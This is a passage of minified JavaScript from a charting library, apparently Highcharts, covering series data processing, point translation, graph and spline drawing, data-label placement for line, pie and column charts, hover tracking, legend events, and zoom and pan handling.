c.getSymbol();s(c.parallelArrays,function(a){c[a+"Data"]=[]});c.setData(b.data,!1);c.isCartesian&&(a.hasCartesianSeries=!0);f.push(c);c._i=f.length-1;fb(f,g);this.yAxis&&fb(this.yAxis.series,g);s(f,function(a,b){a.index=b;a.name=a.name||"Series "+(b+1)})},bindAxes:function(){var a=this,b=a.options,c=a.chart,d;s(a.axisTypes||[],function(e){s(c[e],function(c){d=c.options;if(b[e]===d.index||b[e]!==v&&b[e]===d.id||b[e]===v&&0===d.index)c.series.push(a),a[e]=c,c.isDirty=!0});a[e]||a.optionalAxis===e||
fa(18,!0)})},updateParallelArrays:function(a,b){var c=a.series,d=arguments;s(c.parallelArrays,"number"===typeof b?function(d){var f="y"===d&&c.toYData?c.toYData(a):a[d];c[d+"Data"][b]=f}:function(a){Array.prototype[b].apply(c[a+"Data"],Array.prototype.slice.call(d,2))})},autoIncrement:function(){var a=this.options,b=this.xIncrement,b=r(b,a.pointStart,0);this.pointInterval=r(this.pointInterval,a.pointInterval,1);this.xIncrement=b+this.pointInterval;return b},getSegments:function(){var a=-1,b=[],c,
d=this.points,e=d.length;if(e)if(this.options.connectNulls){for(c=e;c--;)null===d[c].y&&d.splice(c,1);d.length&&(b=[d])}else s(d,function(c,g){null===c.y?(g>a+1&&b.push(d.slice(a+1,g)),a=g):g===e-1&&b.push(d.slice(a+1,g+1))});this.segments=b},setOptions:function(a){var b=this.chart,c=b.options.plotOptions,b=b.userOptions||{},d=b.plotOptions||{},e=c[this.type];this.userOptions=a;c=E(e,c.series,a);this.tooltipOptions=E(I.tooltip,I.plotOptions[this.type].tooltip,b.tooltip,d.series&&d.series.tooltip,
d[this.type]&&d[this.type].tooltip,a.tooltip);null===e.marker&&delete c.marker;return c},getColor:function(){var a=this.options,b=this.userOptions,c=this.chart.options.colors,d=this.chart.counters,e;e=a.color||za[this.type].color;e||a.colorByPoint||(u(b._colorIndex)?a=b._colorIndex:(b._colorIndex=d.color,a=d.color++),e=c[a]);this.color=e;d.wrapColor(c.length)},getSymbol:function(){var a=this.userOptions,b=this.options.marker,c=this.chart,d=c.options.symbols,c=c.counters;this.symbol=b.symbol;this.symbol||
(u(a._symbolIndex)?a=a._symbolIndex:(a._symbolIndex=c.symbol,a=c.symbol++),this.symbol=d[a]);/^url/.test(this.symbol)&&(b.radius=0);c.wrapSymbol(d.length)},drawLegendSymbol:Vb.drawLineMarker,setData:function(a,b,c,d){var e=this,f=e.points,g=f&&f.length||0,h,k=e.options,l=e.chart,m=null,n=e.xAxis,q=n&&!!n.categories,p=e.tooltipPoints,w=k.turboThreshold,u=this.xData,t=this.yData,x=(h=e.pointArrayMap)&&h.length;a=a||[];h=a.length;b=r(b,!0);if(!1===d||!h||g!==h||e.cropped||e.hasGroupedData){e.xIncrement=
null;e.pointRange=q?1:k.pointRange;e.colorCounter=0;s(this.parallelArrays,function(a){e[a+"Data"].length=0});if(w&&h>w){for(c=0;null===m&&c<h;)m=a[c],c++;if($(m)){q=r(k.pointStart,0);k=r(k.pointInterval,1);for(c=0;c<h;c++)u[c]=q,t[c]=a[c],q+=k;e.xIncrement=q}else if(ka(m))if(x)for(c=0;c<h;c++)k=a[c],u[c]=k[0],t[c]=k.slice(1,x+1);else for(c=0;c<h;c++)k=a[c],u[c]=k[0],t[c]=k[1];else fa(12)}else for(c=0;c<h;c++)a[c]!==v&&(k={series:e},e.pointClass.prototype.applyOptions.apply(k,[a[c]]),e.updateParallelArrays(k,
c),q&&k.name&&(n.names[k.x]=k.name));U(t[0])&&fa(14,!0);e.data=[];e.options.data=a;for(c=g;c--;)f[c]&&f[c].destroy&&f[c].destroy();p&&(p.length=0);n&&(n.minRange=n.userMinRange);e.isDirty=e.isDirtyData=l.isDirtyBox=!0;c=!1}else s(a,function(a,b){f[b].update(a,!1)});b&&l.redraw(c)},processData:function(a){var b=this.xData,c=this.yData,d=b.length,e;e=0;var f,g,h=this.xAxis,k=this.options,l=k.cropThreshold,m=0,n=this.isCartesian,q,p;if(n&&!(this.isDirty||h.isDirty||this.yAxis.isDirty||a))return!1;if(n&&
this.sorted&&(!l||d>l||this.forceCrop))if(q=h.min,p=h.max,b[d-1]<q||b[0]>p)b=[],c=[];else if(b[0]<q||b[d-1]>p)e=this.cropData(this.xData,this.yData,q,p),b=e.xData,c=e.yData,e=e.start,f=!0,m=b.length;for(d=b.length-1;0<=d;d--)a=b[d]-b[d-1],!f&&b[d]>q&&b[d]<p&&m++,0<a&&(g===v||a<g)?g=a:0>a&&this.requireSorting&&fa(15);this.cropped=f;this.cropStart=e;this.processedXData=b;this.processedYData=c;this.activePointCount=m;null===k.pointRange&&(this.pointRange=g||1);this.closestPointRange=g},cropData:function(a,
b,c,d){var e=a.length,f=0,g=e,h=r(this.cropShoulder,1),k;for(k=0;k<e;k++)if(a[k]>=c){f=x(0,k-h);break}for(;k<e;k++)if(a[k]>d){g=k+h;break}return{xData:a.slice(f,g),yData:b.slice(f,g),start:f,end:g}},generatePoints:function(){var a=this.options.data,b=this.data,c,d=this.processedXData,e=this.processedYData,f=this.pointClass,g=d.length,h=this.cropStart||0,k,l=this.hasGroupedData,m,n=[],q;b||l||(b=[],b.length=a.length,b=this.data=b);for(q=0;q<g;q++)k=h+q,l?n[q]=(new f).init(this,[d[q]].concat(ha(e[q]))):
(b[k]?m=b[k]:a[k]!==v&&(b[k]=m=(new f).init(this,a[k],d[q])),n[q]=m);if(b&&(g!==(c=b.length)||l))for(q=0;q<c;q++)q!==h||l||(q+=g),b[q]&&(b[q].destroyElements(),b[q].plotX=v);this.data=b;this.points=n},getExtremes:function(a){var b=this.yAxis,c=this.processedXData,d,e=[],f=0;d=this.xAxis.getExtremes();var g=d.min,h=d.max,k,l,m,n;a=a||this.stackedYData||this.processedYData;d=a.length;for(n=0;n<d;n++)if(l=c[n],m=a[n],k=null!==m&&m!==v&&(!b.isLog||m.length||0<m),l=this.getExtremesFromAll||this.cropped||
(c[n+1]||l)>=g&&(c[n-1]||l)<=h,k&&l)if(k=m.length)for(;k--;)null!==m[k]&&(e[f++]=m[k]);else e[f++]=m;this.dataMin=r(void 0,va(e));this.dataMax=r(void 0,la(e))},translate:function(){this.processedXData||this.processData();this.generatePoints();for(var a=this.options,b=a.stacking,c=this.xAxis,d=c.categories,e=this.yAxis,f=this.points,g=f.length,h=!!this.modifyValue,k=a.pointPlacement,l="between"===k||$(k),m=a.threshold,a=0;a<g;a++){var n=f[a],q=n.x,p=n.y,s=n.low,t=b&&e.stacks[(this.negStacks&&p<m?"-":
"")+this.stackKey];e.isLog&&0>=p&&(n.y=p=null);n.plotX=c.translate(q,0,0,0,1,k,"flags"===this.type);b&&this.visible&&t&&t[q]&&(t=t[q],p=t.points[this.index+","+a],s=p[0],p=p[1],0===s&&(s=r(m,e.min)),e.isLog&&0>=s&&(s=null),n.total=n.stackTotal=t.total,n.percentage=t.total&&n.y/t.total*100,n.stackY=p,t.setOffset(this.pointXOffset||0,this.barW||0));n.yBottom=u(s)?e.translate(s,0,1,0,1):null;h&&(p=this.modifyValue(p,n));n.plotY="number"===typeof p&&Infinity!==p?e.translate(p,0,1,0,1):v;n.clientX=l?c.translate(q,
0,0,0,1):n.plotX;n.negative=n.y<(m||0);n.category=d&&d[n.x]!==v?d[n.x]:n.x}this.getSegments()},animate:function(a){var b=this.chart,c=b.renderer,d;d=this.options.animation;var e=this.clipBox||b.clipBox,f=b.inverted,g;d&&!V(d)&&(d=za[this.type].animation);g=["_sharedClip",d.duration,d.easing,e.height].join();a?(a=b[g],d=b[g+"m"],a||(b[g]=a=c.clipRect(t(e,{width:0})),b[g+"m"]=d=c.clipRect(-99,f?-b.plotLeft:-b.plotTop,99,f?b.chartWidth:b.chartHeight)),this.group.clip(a),this.markerGroup.clip(d),this.sharedClipKey=
g):((a=b[g])&&a.animate({width:b.plotSizeX},d),b[g+"m"]&&b[g+"m"].animate({width:b.plotSizeX+99},d),this.animate=null)},afterAnimate:function(){var a=this.chart,b=this.sharedClipKey,c=this.group,d=this.clipBox;c&&!1!==this.options.clip&&(b&&d||c.clip(d?a.renderer.clipRect(d):a.clipRect),this.markerGroup.clip());C(this,"afterAnimate");setTimeout(function(){b&&a[b]&&(d||(a[b]=a[b].destroy()),a[b+"m"]&&(a[b+"m"]=a[b+"m"].destroy()))},100)},drawPoints:function(){var a,b=this.points,c=this.chart,d,e,f,
g,h,k,l,m;d=this.options.marker;var n=this.pointAttr[""],q,p=this.markerGroup,s=r(d.enabled,this.activePointCount<0.5*this.xAxis.len/d.radius);if(!1!==d.enabled||this._hasPointMarkers)for(f=b.length;f--;)g=b[f],d=F(g.plotX),e=g.plotY,m=g.graphic,k=g.marker||{},a=s&&k.enabled===v||k.enabled,q=c.isInsidePlot(z(d),e,c.inverted),a&&e!==v&&!isNaN(e)&&null!==g.y?(a=g.pointAttr[g.selected?"select":""]||n,h=a.r,k=r(k.symbol,this.symbol),l=0===k.indexOf("url"),m?m[q?"show":"hide"](!0).animate(t({x:d-h,y:e-
h},m.symbolName?{width:2*h,height:2*h}:{})):q&&(0<h||l)&&(g.graphic=c.renderer.symbol(k,d-h,e-h,2*h,2*h).attr(a).add(p))):m&&(g.graphic=m.destroy())},convertAttribs:function(a,b,c,d){var e=this.pointAttrToOptions,f,g,h={};a=a||{};b=b||{};c=c||{};d=d||{};for(f in e)g=e[f],h[f]=r(a[g],b[f],c[f],d[f]);return h},getAttribs:function(){var a=this,b=a.options,c=za[a.type].marker?b.marker:b,d=c.states,e=d.hover,f,g=a.color;f={stroke:g,fill:g};var h=a.points||[],k,l=[],m,n=a.pointAttrToOptions;m=a.hasPointSpecificOptions;
var q=b.negativeColor,p=c.lineColor,r=c.fillColor;k=b.turboThreshold;var v;b.marker?(e.radius=e.radius||c.radius+2,e.lineWidth=e.lineWidth||c.lineWidth+1):e.color=e.color||Aa(e.color||g).brighten(e.brightness).get();l[""]=a.convertAttribs(c,f);s(["hover","select"],function(b){l[b]=a.convertAttribs(d[b],l[""])});a.pointAttr=l;g=h.length;if(!k||g<k||m)for(;g--;){k=h[g];(c=k.options&&k.options.marker||k.options)&&!1===c.enabled&&(c.radius=0);k.negative&&q&&(k.color=k.fillColor=q);m=b.colorByPoint||k.color;
if(k.options)for(v in n)u(c[n[v]])&&(m=!0);m?(c=c||{},m=[],d=c.states||{},f=d.hover=d.hover||{},b.marker||(f.color=f.color||!k.options.color&&e.color||Aa(k.color).brighten(f.brightness||e.brightness).get()),f={color:k.color},r||(f.fillColor=k.color),p||(f.lineColor=k.color),m[""]=a.convertAttribs(t(f,c),l[""]),m.hover=a.convertAttribs(d.hover,l.hover,m[""]),m.select=a.convertAttribs(d.select,l.select,m[""])):m=l;k.pointAttr=m}},destroy:function(){var a=this,b=a.chart,c=/AppleWebKit\/533/.test(ma),
d,e,f=a.data||[],g,h,k;C(a,"destroy");T(a);s(a.axisTypes||[],function(b){if(k=a[b])oa(k.series,a),k.isDirty=k.forceRedraw=!0});a.legendItem&&a.chart.legend.destroyItem(a);for(e=f.length;e--;)(g=f[e])&&g.destroy&&g.destroy();a.points=null;clearTimeout(a.animationTimeout);s("area graph dataLabelsGroup group markerGroup tracker graphNeg areaNeg posClip negClip".split(" "),function(b){a[b]&&(d=c&&"group"===b?"hide":"destroy",a[b][d]())});b.hoverSeries===a&&(b.hoverSeries=null);oa(b.series,a);for(h in a)delete a[h]},
getSegmentPath:function(a){var b=this,c=[],d=b.options.step;s(a,function(e,f){var g=e.plotX,h=e.plotY,k;b.getPointSpline?c.push.apply(c,b.getPointSpline(a,e,f)):(c.push(f?"L":"M"),d&&f&&(k=a[f-1],"right"===d?c.push(k.plotX,h):"center"===d?c.push((k.plotX+g)/2,k.plotY,(k.plotX+g)/2,h):c.push(g,k.plotY)),c.push(e.plotX,e.plotY))});return c},getGraphPath:function(){var a=this,b=[],c,d=[];s(a.segments,function(e){c=a.getSegmentPath(e);1<e.length?b=b.concat(c):d.push(e[0])});a.singlePoints=d;return a.graphPath=
b},drawGraph:function(){var a=this,b=this.options,c=[["graph",b.lineColor||this.color]],d=b.lineWidth,e=b.dashStyle,f="square"!==b.linecap,g=this.getGraphPath(),h=b.negativeColor;h&&c.push(["graphNeg",h]);s(c,function(c,h){var m=c[0],n=a[m];n?(Ya(n),n.animate({d:g})):d&&g.length&&(n={stroke:c[1],"stroke-width":d,fill:ca,zIndex:1},e?n.dashstyle=e:f&&(n["stroke-linecap"]=n["stroke-linejoin"]="round"),a[m]=a.chart.renderer.path(g).attr(n).add(a.group).shadow(!h&&b.shadow))})},clipNeg:function(){var a=
this.options,b=this.chart,c=b.renderer,d=a.negativeColor||a.negativeFillColor,e,f=this.graph,g=this.area,h=this.posClip,k=this.negClip;e=b.chartWidth;var l=b.chartHeight,m=x(e,l),n=this.yAxis;d&&(f||g)&&(d=z(n.toPixels(a.threshold||0,!0)),0>d&&(m-=d),a={x:0,y:0,width:m,height:d},m={x:0,y:d,width:m,height:m},b.inverted&&(a.height=m.y=b.plotWidth-d,c.isVML&&(a={x:b.plotWidth-d-b.plotLeft,y:0,width:e,height:l},m={x:d+b.plotLeft-e,y:0,width:b.plotLeft+d,height:e})),n.reversed?(b=m,e=a):(b=a,e=m),h?(h.animate(b),
k.animate(e)):(this.posClip=h=c.clipRect(b),this.negClip=k=c.clipRect(e),f&&this.graphNeg&&(f.clip(h),this.graphNeg.clip(k)),g&&(g.clip(h),this.areaNeg.clip(k))))},invertGroups:function(){function a(){var a={width:b.yAxis.len,height:b.xAxis.len};s(["group","markerGroup"],function(c){b[c]&&b[c].attr(a).invert()})}var b=this,c=b.chart;b.xAxis&&(N(c,"resize",a),N(b,"destroy",function(){T(c,"resize",a)}),a(),b.invertGroups=a)},plotGroup:function(a,b,c,d,e){var f=this[a],g=!f;g&&(this[a]=f=this.chart.renderer.g(b).attr({visibility:c,
zIndex:d||0.1}).add(e));f[g?"attr":"animate"](this.getPlotBox());return f},getPlotBox:function(){var a=this.chart,b=this.xAxis,c=this.yAxis;a.inverted&&(b=c,c=this.xAxis);return{translateX:b?b.left:a.plotLeft,translateY:c?c.top:a.plotTop,scaleX:1,scaleY:1}},render:function(){var a=this,b=a.chart,c,d=a.options,e=(c=d.animation)&&!!a.animate&&b.renderer.isSVG&&r(c.duration,500)||0,f=a.visible?"visible":"hidden",g=d.zIndex,h=a.hasRendered,k=b.seriesGroup;c=a.plotGroup("group","series",f,g,k);a.markerGroup=
a.plotGroup("markerGroup","markers",f,g,k);e&&a.animate(!0);a.getAttribs();c.inverted=a.isCartesian?b.inverted:!1;a.drawGraph&&(a.drawGraph(),a.clipNeg());a.drawDataLabels&&a.drawDataLabels();a.visible&&a.drawPoints();a.drawTracker&&!1!==a.options.enableMouseTracking&&a.drawTracker();b.inverted&&a.invertGroups();!1===d.clip||a.sharedClipKey||h||c.clip(b.clipRect);e&&a.animate();h||(e?a.animationTimeout=setTimeout(function(){a.afterAnimate()},e):a.afterAnimate());a.isDirty=a.isDirtyData=!1;a.hasRendered=
!0},redraw:function(){var a=this.chart,b=this.isDirtyData,c=this.group,d=this.xAxis,e=this.yAxis;c&&(a.inverted&&c.attr({width:a.plotWidth,height:a.plotHeight}),c.animate({translateX:r(d&&d.left,a.plotLeft),translateY:r(e&&e.top,a.plotTop)}));this.translate();this.setTooltipPoints&&this.setTooltipPoints(!0);this.render();b&&C(this,"updatedData")}};var Wb=bb(ga);M.line=Wb;za.spline=E(Rb);var Xb=bb(ga,{type:"spline",getPointSpline:function(a,b,c){var d=b.plotX,e=b.plotY,f=a[c-1],g=a[c+1],h,k,l,m;if(f&&
g){a=f.plotY;l=g.plotX;var g=g.plotY,n;h=(1.5*d+f.plotX)/2.5;k=(1.5*e+a)/2.5;l=(1.5*d+l)/2.5;m=(1.5*e+g)/2.5;n=(m-k)*(l-d)/(l-h)+e-m;k+=n;m+=n;k>a&&k>e?(k=x(a,e),m=2*e-k):k<a&&k<e&&(k=J(a,e),m=2*e-k);m>g&&m>e?(m=x(g,e),k=2*e-m):m<g&&m<e&&(m=J(g,e),k=2*e-m);b.rightContX=l;b.rightContY=m}c?(b=["C",f.rightContX||f.plotX,f.rightContY||f.plotY,h||d,k||e,d,e],f.rightContX=f.rightContY=null):b=["M",d,e];return b}});M.spline=Xb;ga.prototype.drawDataLabels=function(){var a=this,b=a.options,c=b.cursor,d=b.dataLabels,
e=a.points,f,g,h,k;if(d.enabled||a._hasPointLabels)a.dlProcessOptions&&a.dlProcessOptions(d),k=a.plotGroup("dataLabelsGroup","data-labels","hidden",d.zIndex||6),!a.hasRendered&&r(d.defer,!0)&&(k.attr({opacity:0}),N(a,"afterAnimate",function(){a.dataLabelsGroup.show()[b.animation?"animate":"attr"]({opacity:1},{duration:200})})),g=d,s(e,function(b){var e,n=b.dataLabel,q,p,s=b.connector,x=!0;f=b.options&&b.options.dataLabels;e=r(f&&f.enabled,g.enabled);if(n&&!e)b.dataLabel=n.destroy();else if(e){d=E(g,
f);e=d.rotation;q=b.getLabelConfig();h=d.format?ua(d.format,q):d.formatter.call(q,d);d.style.color=r(d.color,d.style.color,a.color,"black");if(n)u(h)?(n.attr({text:h}),x=!1):(b.dataLabel=n=n.destroy(),s&&(b.connector=s.destroy()));else if(u(h)){n={fill:d.backgroundColor,stroke:d.borderColor,"stroke-width":d.borderWidth,r:d.borderRadius||0,rotation:e,padding:d.padding,zIndex:1};for(p in n)n[p]===v&&delete n[p];n=b.dataLabel=a.chart.renderer[e?"text":"label"](h,0,-999,null,null,null,d.useHTML).attr(n).css(t(d.style,
c&&{cursor:c})).add(k).shadow(d.shadow)}n&&a.alignDataLabel(b,n,d,null,x)}})};ga.prototype.alignDataLabel=function(a,b,c,d,e){var f=this.chart,g=f.inverted,h=r(a.plotX,-999),k=r(a.plotY,-999),l=b.getBBox();if(a=this.visible&&(a.series.forceDL||f.isInsidePlot(h,z(k),g)||d&&f.isInsidePlot(h,g?d.x+1:d.y+d.height-1,g)))d=t({x:g?f.plotWidth-k:h,y:z(g?f.plotHeight-h:k),width:0,height:0},d),t(c,{width:l.width,height:l.height}),c.rotation?(g={align:c.align,x:d.x+c.x+d.width/2,y:d.y+c.y+d.height/2},b[e?"attr":
"animate"](g)):(b.align(c,null,d),g=b.alignAttr,"justify"===r(c.overflow,"justify")?this.justifyDataLabel(b,c,g,l,d,e):r(c.crop,!0)&&(a=f.isInsidePlot(g.x,g.y)&&f.isInsidePlot(g.x+l.width,g.y+l.height)));a||(b.attr({y:-999}),b.placed=!1)};ga.prototype.justifyDataLabel=function(a,b,c,d,e,f){var g=this.chart,h=b.align,k=b.verticalAlign,l,m;l=c.x;0>l&&("right"===h?b.align="left":b.x=-l,m=!0);l=c.x+d.width;l>g.plotWidth&&("left"===h?b.align="right":b.x=g.plotWidth-l,m=!0);l=c.y;0>l&&("bottom"===k?b.verticalAlign=
"top":b.y=-l,m=!0);l=c.y+d.height;l>g.plotHeight&&("top"===k?b.verticalAlign="bottom":b.y=g.plotHeight-l,m=!0);m&&(a.placed=!f,a.align(b,null,e))};M.pie&&(M.pie.prototype.drawDataLabels=function(){var a=this,b=a.data,c,d=a.chart,e=a.options.dataLabels,f=r(e.connectorPadding,10),g=r(e.connectorWidth,1),h=d.plotWidth,d=d.plotHeight,k,l,m=r(e.softConnector,!0),n=e.distance,q=a.center,p=q[2]/2,w=q[1],t=0<n,u,v,y,B,E=[[],[]],A,C,H,L,D,G=[0,0,0,0],N=function(a,b){return b.y-a.y};if(a.visible&&(e.enabled||
a._hasPointLabels)){ga.prototype.drawDataLabels.apply(a);s(b,function(a){a.dataLabel&&a.visible&&E[a.half].push(a)});for(L=0;!B&&b[L];)B=b[L]&&b[L].dataLabel&&(b[L].dataLabel.getBBox().height||21),L++;for(L=2;L--;){var b=[],aa=[],I=E[L],J=I.length,F;a.sortByAngle(I,L-0.5);if(0<n){for(D=w-p-n;D<=w+p+n;D+=B)b.push(D);v=b.length;if(J>v){c=[].concat(I);c.sort(N);for(D=J;D--;)c[D].rank=D;for(D=J;D--;)I[D].rank>=v&&I.splice(D,1);J=I.length}for(D=0;D<J;D++){c=I[D];y=c.labelPos;c=9999;var O,M;for(M=0;M<v;M++)O=
R(b[M]-y[1]),O<c&&(c=O,F=M);if(F<D&&null!==b[D])F=D;else for(v<J-D+F&&null!==b[D]&&(F=v-J+D);null===b[F];)F++;aa.push({i:F,y:b[F]});b[F]=null}aa.sort(N)}for(D=0;D<J;D++){c=I[D];y=c.labelPos;u=c.dataLabel;H=!1===c.visible?"hidden":"visible";c=y[1];if(0<n){if(v=aa.pop(),F=v.i,C=v.y,c>C&&null!==b[F+1]||c<C&&null!==b[F-1])C=c}else C=c;A=e.justify?q[0]+(L?-1:1)*(p+n):a.getX(0===F||F===b.length-1?c:C,L);u._attr={visibility:H,align:y[6]};u._pos={x:A+e.x+({left:f,right:-f}[y[6]]||0),y:C+e.y-10};u.connX=A;
u.connY=C;null===this.options.size&&(v=u.width,A-v<f?G[3]=x(z(v-A+f),G[3]):A+v>h-f&&(G[1]=x(z(A+v-h+f),G[1])),0>C-B/2?G[0]=x(z(-C+B/2),G[0]):C+B/2>d&&(G[2]=x(z(C+B/2-d),G[2])))}}if(0===la(G)||this.verifyDataLabelOverflow(G))this.placeDataLabels(),t&&g&&s(this.points,function(b){k=b.connector;y=b.labelPos;(u=b.dataLabel)&&u._pos?(H=u._attr.visibility,A=u.connX,C=u.connY,l=m?["M",A+("left"===y[6]?5:-5),C,"C",A,C,2*y[2]-y[4],2*y[3]-y[5],y[2],y[3],"L",y[4],y[5]]:["M",A+("left"===y[6]?5:-5),C,"L",y[2],
y[3],"L",y[4],y[5]],k?(k.animate({d:l}),k.attr("visibility",H)):b.connector=k=a.chart.renderer.path(l).attr({"stroke-width":g,stroke:e.connectorColor||b.color||"#606060",visibility:H}).add(a.dataLabelsGroup)):k&&(b.connector=k.destroy())})}},M.pie.prototype.placeDataLabels=function(){s(this.points,function(a){a=a.dataLabel;var b;a&&((b=a._pos)?(a.attr(a._attr),a[a.moved?"animate":"attr"](b),a.moved=!0):a&&a.attr({y:-999}))})},M.pie.prototype.alignDataLabel=Lb,M.pie.prototype.verifyDataLabelOverflow=
function(a){var b=this.center,c=this.options,d=c.center,e=c=c.minSize||80,f;null!==d[0]?e=x(b[2]-x(a[1],a[3]),c):(e=x(b[2]-a[1]-a[3],c),b[0]+=(a[3]-a[1])/2);null!==d[1]?e=x(J(e,b[2]-x(a[0],a[2])),c):(e=x(J(e,b[2]-a[0]-a[2]),c),b[1]+=(a[0]-a[2])/2);e<b[2]?(b[2]=e,this.translate(b),s(this.points,function(a){a.dataLabel&&(a.dataLabel._pos=null)}),this.drawDataLabels&&this.drawDataLabels()):f=!0;return f});M.column&&(M.column.prototype.alignDataLabel=function(a,b,c,d,e){var f=this.chart,g=f.inverted,
h=a.dlBox||a.shapeArgs,k=a.below||a.plotY>r(this.translatedThreshold,f.plotSizeY),l=r(c.inside,!!this.options.stacking);h&&(d=E(h),g&&(d={x:f.plotWidth-d.y-d.height,y:f.plotHeight-d.x-d.width,width:d.height,height:d.width}),l||(g?(d.x+=k?0:d.width,d.width=0):(d.y+=k?d.height:0,d.height=0)));c.align=r(c.align,!g||l?"center":k?"right":"left");c.verticalAlign=r(c.verticalAlign,g||l?"middle":k?"top":"bottom");ga.prototype.alignDataLabel.call(this,a,b,c,d,e)});var ab=S.TrackerMixin={drawTrackerPoint:function(){var a=
this,b=a.chart,c=b.pointer,d=a.options.cursor,e=d&&{cursor:d},f=function(c){var d=c.target,e;if(b.hoverSeries!==a)a.onMouseOver();for(;d&&!e;)e=d.point,d=d.parentNode;if(e!==v&&e!==b.hoverPoint)e.onMouseOver(c)};s(a.points,function(a){a.graphic&&(a.graphic.element.point=a);a.dataLabel&&(a.dataLabel.element.point=a)});a._hasTracking||(s(a.trackerGroups,function(b){if(a[b]&&(a[b].addClass("highcharts-tracker").on("mouseover",f).on("mouseout",function(a){c.onTrackerMouseOut(a)}).css(e),Ga))a[b].on("touchstart",
f)}),a._hasTracking=!0)},drawTrackerGraph:function(){var a=this,b=a.options,c=b.trackByArea,d=[].concat(c?a.areaPath:a.graphPath),e=d.length,f=a.chart,g=f.pointer,h=f.renderer,k=f.options.tooltip.snap,l=a.tracker,m=b.cursor,n=m&&{cursor:m},m=a.singlePoints,q,p=function(){if(f.hoverSeries!==a)a.onMouseOver()},r="rgba(192,192,192,"+(ba?1E-4:0.002)+")";if(e&&!c)for(q=e+1;q--;)"M"===d[q]&&d.splice(q+1,0,d[q+1]-k,d[q+2],"L"),(q&&"M"===d[q]||q===e)&&d.splice(q,0,"L",d[q-2]+k,d[q-1]);for(q=0;q<m.length;q++)e=
m[q],d.push("M",e.plotX-k,e.plotY,"L",e.plotX+k,e.plotY);l?l.attr({d:d}):(a.tracker=h.path(d).attr({"stroke-linejoin":"round",visibility:a.visible?"visible":"hidden",stroke:r,fill:c?r:ca,"stroke-width":b.lineWidth+(c?0:2*k),zIndex:2}).add(a.group),s([a.tracker,a.markerGroup],function(a){a.addClass("highcharts-tracker").on("mouseover",p).on("mouseout",function(a){g.onTrackerMouseOut(a)}).css(n);if(Ga)a.on("touchstart",p)}))}};M.column&&(ColumnSeries.prototype.drawTracker=ab.drawTrackerPoint);M.pie&&
(M.pie.prototype.drawTracker=ab.drawTrackerPoint);M.scatter&&(ScatterSeries.prototype.drawTracker=ab.drawTrackerPoint);t($a.prototype,{setItemEvents:function(a,b,c,d,e){var f=this;(c?b:a.legendGroup).on("mouseover",function(){a.setState("hover");b.css(f.options.itemHoverStyle)}).on("mouseout",function(){b.css(a.visible?d:e);a.setState()}).on("click",function(b){var c=function(){a.setVisible()};b={browserEvent:b};a.firePointEvent?a.firePointEvent("legendItemClick",b,c):C(a,"legendItemClick",b,c)})},
createCheckboxForItem:function(a){a.checkbox=ta("input",{type:"checkbox",checked:a.selected,defaultChecked:a.selected},this.options.itemCheckboxStyle,this.chart.container);N(a.checkbox,"click",function(b){C(a,"checkboxClick",{checked:b.target.checked},function(){a.select()})})}});I.legend.itemStyle.cursor="pointer";t(Qa.prototype,{showResetZoom:function(){var a=this,b=I.lang,c=a.options.chart.resetZoomButton,d=c.theme,e=d.states,f="chart"===c.relativeTo?null:"plotBox";this.resetZoomButton=a.renderer.button(b.resetZoom,
null,null,function(){a.zoomOut()},d,e&&e.hover).attr({align:c.position.align,title:b.resetZoomTitle}).add().align(c.position,!1,f)},zoomOut:function(){var a=this;C(a,"selection",{resetSelection:!0},function(){a.zoom()})},zoom:function(a){var b,c=this.pointer,d=!1,e;!a||a.resetSelection?s(this.axes,function(a){b=a.zoom()}):s(a.xAxis.concat(a.yAxis),function(a){var e=a.axis,h=e.isXAxis;if(c[h?"zoomX":"zoomY"]||c[h?"pinchX":"pinchY"])b=e.zoom(a.min,a.max),e.displayBtn&&(d=!0)});e=this.resetZoomButton;
d&&!e?this.showResetZoom():!d&&V(e)&&(this.resetZoomButton=e.destroy());b&&this.redraw(r(this.options.chart.animation,a&&a.animation,100>this.pointCount))},pan:function(a,b){var c=this,d=c.hoverPoints,e;d&&s(d,function(a){a.setState()});s("xy"===b?[1,0]:[1],function(b){var d=a[b?"chartX":"chartY"],h=c[b?"xAxis":"yAxis"][0],k=c[b?"mouseDownX":"mouseDownY"],l=(h.pointRange||0)/2,m=h.getExtremes(),n=h.toValue(k-d,!0)+l,k=h.toValue(k+c[b?"plotWidth":"plotHeight"]-d,!0)-l;h.series.length&&n>J(m.dataMin,
m.min)&&k<x(m.dataMax,m.max)&&(h.setExtremes(n,k,!1,!1,{trigger:"pan"}),e=!0);c[b?"mouseDownX":"mouseDownY"]=d});e&&c.redraw(!1);X(c.container,{cursor:"move"})}});t(Ja.prototype,{select:function(a,b){var c=this,d=c.series,e=d.chart;a=r(a,!c.selected);c.firePointEvent(a?"select":"unselect",{accumulate:b},function(){c.selected=c.options.selected=a;d.options.data[Wa(c,d.data)]=c.options;c.setState(a&&"select");b||s(e.getSelectedPoints(),function(a){a.selected&&a!==c&&(a.selected=a.options.selected=!1,
d.options.data[Wa(a,d.data)]=a.options,a.setState(""),a.firePointEvent("unselect"))})})},onMouseOver:function(a){var b=this.series,c=b.chart,d=c.tooltip,e=c.hoverPoint;if(e&&e!==this)e.onMouseOut();this.firePointEvent("mouseOver");!d||d.shared&&!b.noSharedTooltip||d.refresh(this,a);this.setState("hover");c.hoverPoint=this},onMouseOut:function(){var a=this.series.chart,b=a.hoverPoints;b&&-1!==Wa(this,b)||(this.firePointEvent("mouseOut"),this.setState(),a.hoverPoint=null)},importEvents:function(){if(!this.hasImportedEvents){var a=
E(this.series.options.point,this.options).events,b;this.events=a;for(b in a)N(this,b,a[b]);this.hasImportedEvents=!0}},setState:function(a,b){var c=this.plotX,d=this.plotY,e=this.series,f=e.options.states,g=za[e.type].marker&&e.options.marker,h=g&&!g.enabled,k=g&&g.states[a],l=k&&!1===k.enabled,m=e.stateMarkerGraphic,n=this.marker||{},q=e.chart,p=e.halo,r;a=a||"";r=this.pointAttr[a]||e.pointAttr[a];if(!(a===this.state&&!b||this.selected&&"select"!==a||f[a]&&!1===f[a].enabled||a&&(l||h&&!1===k.enabled)||
